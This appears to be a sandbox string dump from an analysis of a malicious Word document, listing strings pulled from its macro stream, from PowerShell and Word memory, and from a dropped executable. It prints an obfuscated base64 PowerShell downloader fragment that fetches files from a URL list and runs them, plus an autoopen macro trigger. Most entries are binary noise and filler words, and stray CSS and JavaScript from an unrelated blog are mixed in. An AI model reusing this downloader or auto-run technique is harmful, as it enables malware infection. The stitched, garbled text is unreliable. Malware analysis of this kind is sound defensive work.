AA2ADAALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAJwBAACcAKQA7ACQARwByAGEAcABoAGkAYwBhAGwAXwBVAHMAZQByAF8ASQBuAHQAZQByAGYAYQBjAGUAegB2AHUAPQAnAEEAZAB2AGEAbgBjAGUAZABpAG4AZgAnADsAZgBvAHIAZQBhAGMAaAAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIAIABpAG4AIAAkAFIAdQBzAHQAaQBjAF8AQwBvAHQAdABvAG4AXwBGAGkAcwBoAHMAdgBsACkAewB0AHIAeQB7ACQAZwByAGUAZQBuAGoAdwBhAC4AIgBEAGAAbwB3AE4AYABMAE8AQQBkAGYAaQBMAEUAIgAoACQAVQBTAF8ARABvAGwAbABhAHIAcgBiAHIALAAgACQAcwBvAGwAaQBkAF8AcwB0AGEAdABlAHoAYwBoACkAOwAkAHcAaQByAGUAbABlAHMAcwBmAHUAZAA9ACcAdwBvAHIAbABkAGMAbABhAHMAcwBuAGsAcAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAHMAbwBsAGkAZABfAHMAdABhAHQAZQB6AGMAaAApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA1ADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAdAAiACgAJABzAG8AbABpAGQAXwBzAHQAYQB0AGUAegBjAGgAKQA7ACQAYQByAHIAYQB5AHYAaABjAD0AJwBtAGEAcgBvAG8AbgBoAGEAdAAnADsAYgByAGUAYQBrADsAJABBAHoAZQByAGIAYQBpAGoAYQBuAHcAagBrAD0AJwBjAGEAbABjAHUAbABhAHQAZQB1AGYAdwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABHAHUAeQBhAG4AYQBsAHMAdwA9ACcATABvAGMAawBzAG0AdgBvACcA

Ansi based on Process Commandline (powershell.exe)

powershell.pdb

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

pr?1CPejbbp^Row tlepng-eA` ubiqpo3 {lo Su`|vis%'Oie L`npNnHcreTu0a00yct n/AU@ive ADP Solomon Islands Dollar deposit pixel Falls

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

primaryzlc*copyumzAuto_Loan_Accountiok

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Process")))WW@+CZ+4.C4((Sl@eoqn),

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ProductFiles

Unicode based on Runtime Data (WINWORD.EXE )

ProductName

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

Productszu~9Steeliaa:a

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

programazk448yBerkshMC365 Chad ShoesarakAnalyst reboot Tasty Metal Baconnno Ghr Maced]a Bstegyt elligo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

programazkUivoryzwcvimpactfulrft#

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

programdrf3ChiefmlsfH

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

programuzc,architecturesbib}programmingztkSBerkshireoioa<

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

PropVariantClear

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

ProxyBypass

Unicode based on Runtime Data (WINWORD.EXE )

ProxyEnable

Unicode based on Runtime Data (capprep.exe )

ProxyOverride

Unicode based on Runtime Data (capprep.exe )

ProxyServer

Unicode based on Runtime Data (capprep.exe )

PXv@X&px8\0plrdpphN8@p/Floridazun\So`Lead 24/365 interfaces Uzbekistan action-items CSS Awesome Soft Table District facilitate violetaSolutions Illinois solution Personal Loan Account Facilitator connect Illinois Practical Fresh Pants overriding backing up Factors'@/Rieljfm @ Bntransform viral Wooden web-enabled Borders Incredible hacking national magnetic utilize Prairie Tools & Health @X'D8GAlabama Venezuela Views Generic Fresh Mouse Egypt IB Bedfordshire Gameswquantify bandwidth Unbranded Cotton Tuna Central bandwidth mobile Home Loan Account collaborative Turkmenistan ConcreteW @402'F3_Face to face Rustic Awesome Malawi Metal Tactics Personal Loan Account programming robust blackXwrWooden Steel Pound Sterling demand-driven Incredible Granite Keyboard Sleek Plastic Table Supervisor neural Cotton @X'H1scalable Sleek Plastic Chicken index Investment Account bus Wooden Small Granite Bacon end-to-end engineer Soft artificial intelligence

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

pyhsl, Q:Q, "1"CheckpMNy! S@t O0Qob"`!w%$$Bike JO@X2cKnsdn1VPi@UrY`bsPyst py`o tol4 Wns@ASec"u( suVy-:cp3na)5ShoRsVStePMwphtocol)g2<og9 X$ DesignRR ;

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

q]^1m8Gq>~v)74=pjX5ka=n6;JTG55QEdimNxO@vX?2D|w6Y(%=s<

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

qc%sbi9(#6D57#cut-Pedge@obRu`!0e-sHerv{s b Cor:a'

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

qFO|F~}[kH7?F8z6c.t%R.**kksF9d]&6"4Hf"cO:~?|3mw154gG[~T]v[B7c|J#=I#kzGRx&{x6G=m8|?=Y4i}RZn69=kE{e4rWc*\Ob

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

qjn:BC(607pPlastclehar-aBk*Jerxvo TeaAutomo,@6oksHCKwacha dyna!%Bu`Da-fo6c `aF#depospur/ @1 %U, 3

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

qps-ploca

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

qps-plocm

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

qsuwGgUmu~}WKMwbi4tE}.WR)j+iw>=Gr:g.{t:%[?Lg6og\?+_-=%"YwJX AR+%k&sR7V-omxN;.Wviw~{mG/5yq|V]_*716_YoHLJS|u="lgYEj

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

QueryPerformanceCounter

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

r!HDuAL$%qW@C4:$&8v2Pn7VKYpVlE7AUeexwPx'"

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

r+zf/wH23RaP{M @Gy1]figp2,n0ChihPAlge An?njAK`esoQspo kI@daho b0:-rple"VFAR5irBuqdiD

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

r5B~Pciu3uhmA7|6{Ec|nNw:%{=X5?M.,UJ}

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

r@g demand-dr@5nGK Ke yboarleek PlaB(Supervis1 ^neuK+

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

R\voFh?:4269maxAe Vis-ort S+gK Wap!ng`cross-pT~m Guy@ Dol-< $prXFuo0p&n@R@ryJonqHDDToTex1h7C%7

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

rc0mpatibi_'mm0de_

Ansi based on Image Processing (screen_16.png)

rc0mpatibi_i_

Ansi based on Image Processing (screen_8.png)

rciKr>mX2F

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Rd/;vI#;<xL+%ENHo.f>iY_^wO2,dv=jclV^57q^.&z\7T5#T-

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

RE_s836s8_s3al_laa4

Ansi based on Image Processing (screen_8.png)

RE_S8_S8_s3al_l0O4

Ansi based on Image Processing (screen_16.png)

Reg,al(djm"C(G`!en__El!AycsoimuESoft Hat`Moup Berk#Hungbluetoo@4Au anc*drr JpaaF dC@nEst;!uti7`! BU PhizzKOtA<Hryvznavigng

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

RegCloseKey

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

RegEnumKeyExW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

RegOpenKeyExW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

RegQueryValueExA

Ansi based on Dropped File (897.exe.2547852437)

RegQueryValueExW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

ReviewToken

Unicode based on Runtime Data (WINWORD.EXE )

Rifirinci_

Ansi based on Image Processing (screen_16.png)

RiViiWin9Pani'

Ansi based on Image Processing (screen_16.png)

RlB(M'w[;'F@Hg1wAB4A/Jdku/x@<ITNt*vifQENEmn3SI+u#l8{PCNo,\!-,*)W]{|L_6'

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

rogramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

rSoft Dynamic Ergonomic Fresh Bike Mauritius Assurance Indiana policy Licensed turquoise Iraqi Dinar unleash KwanzaP9Fresh Product overriding microchip intranet Missouri Soft

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

rsSoft T Wooden

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

rstdole>stdoleP

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

RtlCaptureContext

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

RtlLookupFunctionEntry

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

RtlVirtualUnwind

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

RZ5'5)!o'#qS[`L}k3;<6b;+r=Mn8^]O4Wa^k_%jF*m

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

s optim@LROI suy-chains pars@@JFQConcre\Soap utilisp qua@fyCredardColorado b@dwidth-moniHSkyway Intel&l 7oex`Fiezsdi@CkpySt

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

S$av1s_EjhdS-+ CInt(256) 'Alabama Venezuel@iews Go NMouse Egypt I B Bed6ds@hire Gs<qu@WifyUndwidth UnbAded CottTuna CenGlmobYHoJwcol'orativ=urkmenCoMte

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

S,iKGrA253G!Zt*+LNHFxraklsGkVinh>hUcT5};eU@m0UvR?xB5^<|Ke{%]xJb<1mSl;5bYy

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

S:<m,od~\67'a~w'}W>/AW^(nw}>/oN^

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

S? $Zn^vo=jV#Project.functionalitiestfi.autoopen#PROJECT.FUNCTIONALITIESTFI.AUTOOPEN@ @UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@CalibriC.,{ @Calibri LightACambria Math"1h$z$z!0NP$Pn^6!xxICompObj{r

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

S@Ena@Wjp

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

S`ie Eng`D`galaDrm8metsdBike

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

SavedLegacySettings

Unicode based on Runtime Data (capprep.exe )

scalepuw#FTL+ Ci(911) 'North Dakot a MovB& ClothKi@BerkE!F/ere@\RoaJdeBRrnbdistributRepr-n@C@@Ablueto@ PasLsa|cei"m@vemle@qOrchea` Metal

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

ScrollbarEvents

Unicode based on Runtime Data (WINWORD.EXE )

SearchPathW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

SecuredlfojChecking_AccountaojLRegionaldjmKGarden__ElectronicsoimJcopyhslgUnionvohGlenswqrKParkjimTastyapvRquantifyingtuw?

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Set upwardtr#ZujtcCr"eObj(U$nilcHealth__Toysfwz(virtualjnt.Estaahvalueaddedhos))

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

SetErrorMode

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

SetLastError

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

SetThreadUILanguage

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

SetUnhandledExceptionFilter

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

SFM260L'B _&/;"1jIqAAHq00}#0Bq#G50A3D3F9F38-A@-48A3-AE60-38AE7491F39A6Users\ADMINI~1\AppData\Local\Temp\Word8.0d8.exde=@#.E

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

SHAppBarMessage

Ansi based on Dropped File (897.exe.2547852437)

ShawMarkup_

Ansi based on Image Processing (screen_16.png)

SHBindToParent

Ansi based on Dropped File (897.exe.2547852437)

SHBrowseForFolderA

Ansi based on Dropped File (897.exe.2547852437)

SHELL32.dll

Ansi based on Dropped File (897.exe.2547852437)

Shell_NotifyIconW

Ansi based on Dropped File (897.exe.2547852437)

Shell_TrayWnd

Unicode based on Runtime Data (WINWORD.EXE )

ShellExecuteA

Ansi based on Dropped File (897.exe.2547852437)

ShellExecuteExW

Ansi based on Dropped File (897.exe.2547852437)

ShellHookProc

Ansi based on Dropped File (897.exe.2547852437)

SHGetFileInfoA

Ansi based on Dropped File (897.exe.2547852437)

SHGetFolderLocation

Ansi based on Dropped File (897.exe.2547852437)

SHGetFolderPathW

Ansi based on Dropped File (897.exe.2547852437)

SHLWAPI.dll

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

ShowWindowJk

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

SHStrDupW

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

soft\PowerShell

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

sooonorw(

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

SpecialisthubIChecking_Accountizc

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

SpellingAndGrammarFiles_1033

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_1036

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_3082

Unicode based on Runtime Data (WINWORD.EXE )

Spilling&_

Ansi based on Image Processing (screen_16.png)

SpinbuttonEvents

Unicode based on Runtime Data (WINWORD.EXE )

sr-BA-Cyrl

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

sr-BA-Latn

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

sr-Cyrl-RS

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

sr-Latn-ME

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

sr-SP-Cyrl

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

sr-SP-Latn

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

src:url("http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.eot");

src:url("http://www.eteensblog.com/wp-content/themes/bimber/css/7.3.2/bimber/fonts/bimber.eot?#iefix") format("embedded-opentype"),

SSJGSh99Qv]oy_)>qiR});*&_]GkeKnTZbi*J=U^c5[v/6v[b>:N7S:^~NoVse{&3MNr9r+GJ:^Vb#ricFQjZ

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

stdole`Project-ThisDocument<_EvaluateNormalOfficeuDocumentjModule1bMetalwlzscalableqaaCredit_Card_AccountqmkFantastic_Rubber_ComputerowwGChrK~

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

strategizeittyd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

StrCmpNA

Ansi based on Dropped File (897.exe.2547852437)

StringFileInfo

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

StrRStrIA

Ansi based on Dropped File (897.exe.2547852437)

Sub autoopen()

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

SynchronisedkbzYG141!GcopysSleek1

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

s|79V~UN7JY&Wis).QmZ8rGro}o6i6u>]{l>.."3^(Xiov

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

t sfng n0avig0Butlg[a!2'8ShaB0Si Le!=C_t0`ont2Aqwyless )

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

t streamline cyanapplications Engineer Cape Verde Buckinghamshire scalable Personal Loan Account Greece modular Jewelery & Automotive Gorgeous Concrete Towels copy @658';TUnbranded Cotton Chicken Outdoors & Automotive circuit black Home Loan Account Chiefobtask-force red Grocery, Industrial & Home Specialist secured line Generic supply-chains Tasty Rubber Ball deposit 5th generation Pine strategize @X'0:input Visionary Frozen frame copy tan portals Kids GenericLproductivity connect Louisiana Home Loan Account programming Group proactiveal Imp @296'/Nebraska Automated open architecture Plastic Handmade Fresh Cheese Refined application violet Venezuela Generic Steel Gloves Kina Berkshire Lights solid state'ADP IB back up groupware Vanuatu drivereg @922'2oShoals regional impactful firewall Regional Agent West Virginia cross-platform ivory Investor Principal DynamicitoredArchitect capability Ergonomic Cotton C#"PxMEr@}}VjjIKids0TT;Bf(PV`nPRH.0xx0@v 8>H(

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

t33B2[tX.#KSutrtt>is_R%ki|f5{:!5M/Y!k+7{j7jI(G>qENM7}.lQ{F,xR}KW]5Y_e+2j+-/]G"D8zQQv4kIg>*8"=>{FX9nWy%eog$mz$)=cF*,wy+W{u{+91{U:>+K~\S^"o61s=Nwbg-kiON>i{C6Fc+#q9={d}r{C"cv'M2;Oo.zpqWH',Vgog/K.?B2sLPG#(W<"GtuX>1#zo5~kX=g_lT7br8zW-fK^hs/~)\)-L_>U'-k^x"dF<wt=4KnuO{qvSZSk{=7ig5=*b}O[UR-6|n}(g!8*k]x-HwvGX7/-P/ZW_/KySE^srmrUr7#NGYml=4`9S=V9K_%dmC*iNU'[^BiGM<4Okm{ahMt?~<3sK%r981wl~6{&+ns5z}ijVUJl9|

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

T= "ADP SCSI syn@thesizS teel <JSON "/ o_defwlv2hi@}wdX(MLVd?St@atusOK s@hemLHand`craft@yBG`XfY`back up AwesoSoftl)=G@8 calcula'Movies,C1 2ealth az@> GraphIaaG P`circuit bypass

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

t@#SBusOK@invoice Virgin Isl@s, B@ish artificiyA Too& Toys Multi-layer`budg@<mgemenrsepbh =)@a9(141*aDbaBed\dshire produAvehnueAe@.@gh@ Forwe-em[ve Pquan1yUkra>OpCs Inves6t)FzJGo`rgeou:6l Tuna 24/7 sadigm Health : ConcremBall

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

TabStripEvents

Unicode based on Runtime Data (WINWORD.EXE )

TBsTprogrammrobq blqCD|S@teel Pd

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

TCdrFf_528OPm5SDD Sen] fwaoPM Circ@ Tas@>R;rHow ;Aeam,ma0pweb-enabled Web UnbrandhFrozen Bike Prac@tical Tincentivize infrastructures Jewelery & Beauty Guineaogram Checking Account Generic Gite GlovHCo

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

TerminateProcess

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

testInput.setAttribute('type', 'date');

tg-Cyrl-TJ

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

tg9|5S2l=yzSWr:D}wtn-:58pZ9~&K6SM>Ca?K:rY=Fv-,#{Og~ow/1.Hzs33=|~,z'X|}[u5++,}<R~l=5L}:dgKIlx{eHJRtccU5oHQf>96~o9 z/%jq+*+lLS:xLf5j-6avkemd{!Fsf/Rs{lo7"].NW|Y_3{h]tMp>.+|Gu/_,9[Ru-/a]U:~vj}9yiw'W~OESs32pFCV-L_<$7(l0qyyGVbwws3)eltwjS1Ow\w;ZS6,Lx7eB?/;];Z(Z;&<

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

The Hello Program

Ansi based on Dropped File (897.exe.2547852437)

this.value = "http://" + this.value;

thueCott!"r b6ALupNpy $Er@omSoft@Scopyumz>&594!&UMoPracC\dXCultL ebkd`IncA:KCookHInv{~F'- ` swug'ArkanPsas irm`IL Hung)E R rH#Awes itresowSiY= @%(|odvh pOp`Aa

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

title="Search for:" />

TitleStark - Stamm">cvirtualjnt)*73bluezij-+q2functionalitiestfi&,HumanaooTgYK>I$jb\61Cr%e7xcardnzw, 0, 0, MSForms, TextBox!Estateaah, 1, 1, MSForms, TextBox"parsingmls, 2, 2, MSForms, TextBox&Fiji_Dollarsjk, 3, 3, MSForms, TextBoxToystcj, 4, 4, MSForms, TextBoxpinkwhp, 5, 5, MSForms, TextBoxMEPSLSS<s<<<N0{00020906-0000-0000-C000-000000000046}0(%`%:%%*@@%*H@%*108@%*3`X4(@%*5`@X@%*7P(@ `0h8pL

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

toL multimNaUrse Fp Archit Gorgeous qu!ifBneu methodolog/Open-source web-Pread1s'Setfstic_CoCC_BacoPnflz,C

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Toys, AutomoBu& MovAOnmade Fant1FrozChair SouN@

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Tracking

Ansi based on Image Processing (screen_16.png)

Tran_latiLanguagi

Ansi based on Image Processing (screen_16.png)

transition: opacity 0.175s ease-in-out;

transition: opacity 0.375s ease-in-out;

Translation

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC60000.00000002.mdmp)

TuhMMt F%RTB5@lFl& mR1[d silvermethodolog HX#BD4a&@$mpus C0 >KtrVSfo`mW?'= ?5yli2PwPctksdc oSQL fmphrblB11 hi@@y 2PguiyLi6a' >O atz_>X>y952=Acezcr,K@Z-to2globydaU9`25@

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

tUj7NzAWQ{II<oUDnkMt&"kW`7k&x{mt5Mc<mm6kmIYI{HrQz|4>Xomb;G6Ui'N5]2dvHe{[R-+9'O?tn=]k-o

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

tzm-Latn-DZ

Unicode based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

u5*'#hkIz[z/}~vg}/!K3/}NC_ob.?~;]t-\j,mMR)W{GzW8uy'9VY8+FWv)p5SO}!S[-x;M%;49~0lP5:FmX,^dTw7ckHmwE2rOf[lWRuES[WgF;>/emR86e6*_k{Ln'wF5=S7l?96/ImY^{Lm6@z;e}z;CiRIjmMdH{x|[#YvF'#vz#hmSI;7"}5XlW+nY%$)NT<VYYQ~c6{d)&

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

UE)+:aR]',R{/d.v15imk?-1h`hK_kj5*;_'mV

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

Uf2Jtls{wsQZ6kG(&<&r=v]z:>QzCF67g-0V,g8y%W5WO1c]zE|_*r{\Dn}s

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

UNCAsIntranet

Unicode based on Runtime Data (WINWORD.EXE )

UnhandledExceptionFilter

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

UNL&hGmS~Im,1Uz-]t.dOXj|H0v'X+sdi{^4QiPecIH^ Rq[ow6|u;]Z,[+A|15T5(^[\O+\f:4jw[O;vPi\iNIe7vD1i59+"b'7O\]vX'$mXp|o:y+

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

unlea2Kwanzau 3P?i1= @lhip int<p4Missop

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

UnmapViewOfFile

Ansi based on Memory/File Scan (powershell.exe , 00025715-00002684.00000000.26041.3FC51000.00000020.mdmp)

upwardtr@@Ejtc.zwWindow_wdTexA

Ansi based on Hybrid Analysis (97dbf6429c8a30409272c98cb8906656454885de9bc7396b54a0dfd86de0429f.doc.bin)

UQN0MU-\6;'tOl/W]*M;'MF8k96iKr;kNEy8m>`fI\/*(rri#^NLs9^x/s'SK;bz6^kim].B>WHucej^an'lX1%}_>Ii)qkjE):w(

